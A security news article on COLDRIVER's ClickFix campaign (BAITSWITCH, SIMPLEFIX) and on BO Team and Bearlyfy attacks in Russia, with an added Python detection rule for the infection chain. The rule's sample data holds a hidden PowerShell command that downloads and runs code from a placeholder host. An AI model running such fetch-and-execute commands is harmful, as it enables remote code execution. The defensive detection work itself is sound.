The latest ClickFix-style attacks have been linked to the Russian advanced persistent threat (APT) group COLDRIVER, which is behind the distribution of two new malware families known as BAITSWITCH and SIMPLEFIX.
Zscaler ThreatLabz, the cybersecurity firm that first discovered this multi-stage ClickFix campaign, has identified BAITSWITCH as a downloader that deploys the PowerShell backdoor SIMPLEFIX.
COLDRIVER, also recognized as Callisto, Star Blizzard, and UNC4057, has been targeting various sectors since 2019. Initially using spear-phishing tactics, the group has evolved to include custom tools like SPICA and LOSTKEYS, showcasing their technical capabilities.
Previous research by the Google Threat Intelligence Group (GTIG) in May 2025 highlighted COLDRIVER’s use of ClickFix techniques, employing fake CAPTCHA prompts to deliver the LOSTKEYS Visual Basic Script.
Zscaler’s security researchers Sudeep Singh and Yin Hong Chang emphasized the effectiveness of ClickFix as an infection vector in their recent report, despite its lack of novelty or sophistication.
The latest attack method involves deceiving users into running a malicious DLL disguised as a CAPTCHA check, leading to the deployment of the BAITSWITCH downloader, which fetches the SIMPLEFIX backdoor from an attacker-controlled domain. The attackers also use decoy documents hosted on Google Drive to lure victims.
Following the initial infection, the attackers execute various commands to establish persistence, store encrypted payloads, download additional PowerShell scripts, and erase traces of the ClickFix attack. The PowerShell stager then retrieves the SIMPLEFIX backdoor, enabling communication with a command-and-control server for further malicious activities.
One of the PowerShell scripts executed through SIMPLEFIX gathers information on specific file types in designated directories, similar to the LOSTKEYS malware.
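The infection chain described above (a user-launched DLL that starts a PowerShell downloader, which in turn fetches the backdoor) leaves a recognizable parent-child pattern in process telemetry. The following is an added detection example, not code from Zscaler or from the campaign: it correlates constructed Sysmon-style process-creation events and flags a PowerShell process with network-download cmdlets whose ancestor is a DLL host (assumed here to be rundll32.exe or regsvr32.exe, since the report does not name the host) loading a DLL from a user-writable path. Event fields, paths and URLs are all constructed.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\u\AppData\Local\Temp\captcha.dll,Verify"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"IEX((New-Object Net.WebClient)"
            ".DownloadString('http://stager.example.invalid/s'))\""},
    {"pid": 400, "ppid": 100, "image": "powershell.exe",
     "cmd": "powershell.exe -c Get-Date"},                      # benign admin use
    {"pid": 500, "ppid": 100, "image": "rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign
    {"pid": 600, "ppid": 500, "image": "control.exe", "cmd": "control.exe"},
]

# First link: a DLL host (assumed rundll32/regsvr32) loading a DLL from a
# user-writable location rather than a system directory.
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)
# Second link: PowerShell that pulls code from the network (the stager step).
DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod",
    re.I)

def detect_clickfix_chain(events, max_depth=3):
    """Return (powershell_pid, dll_host_pid) pairs where a downloading PowerShell
    process descends, within max_depth parents, from a suspicious DLL host."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() != "powershell.exe" or not DOWNLOAD.search(e["cmd"]):
            continue
        parent, depth = by_pid.get(e["ppid"]), 0
        while parent and depth < max_depth:
            if parent["image"].lower() in DLL_HOSTS and USER_WRITABLE.search(parent["cmd"]):
                hits.append((e["pid"], parent["pid"]))
                break
            parent, depth = by_pid.get(parent["ppid"]), depth + 1
    return hits

if __name__ == "__main__":
    for child, ancestor in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"ClickFix-like chain: pid {ancestor} (DLL host) -> pid {child} (PowerShell downloader)")
```

The benign rundll32 launch of a System32 DLL and the plain administrative PowerShell call are deliberately included so the rule fires only on the combined chain, not on either process alone.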
Zscaler noted that COLDRIVER primarily targets NGOs, human rights defenders, and think tanks in Western regions, consistent with the group's established victim profile.
BO Team and Bearlyfy Target Russia
Kaspersky recently observed a phishing campaign by the BO Team group targeting Russian companies, distributing a new version of the BrockenDoor backdoor and the ZeronetKit malware.
ZeronetKit, a Golang backdoor, enables remote access to compromised systems, file manipulation, command execution, and tunnel creation. The attackers use BrockenDoor to achieve persistence on infected systems.
Meanwhile, the newly emerged Bearlyfy group has carried out ransomware attacks against Russian entities, with incidents involving the exploitation of Bitrix vulnerabilities and Zerologon for initial access and privilege escalation.
Bearlyfy, active since January 2025, has targeted Russian and Belarusian companies, using encryption and data manipulation tools for immediate impact. The group’s tactics differ from the more complex APT campaigns conducted by PhantomCore, another threat actor targeting similar regions.
While there are infrastructure overlaps between Bearlyfy and PhantomCore, Bearlyfy operates independently, focusing on swift attacks with minimal preparation.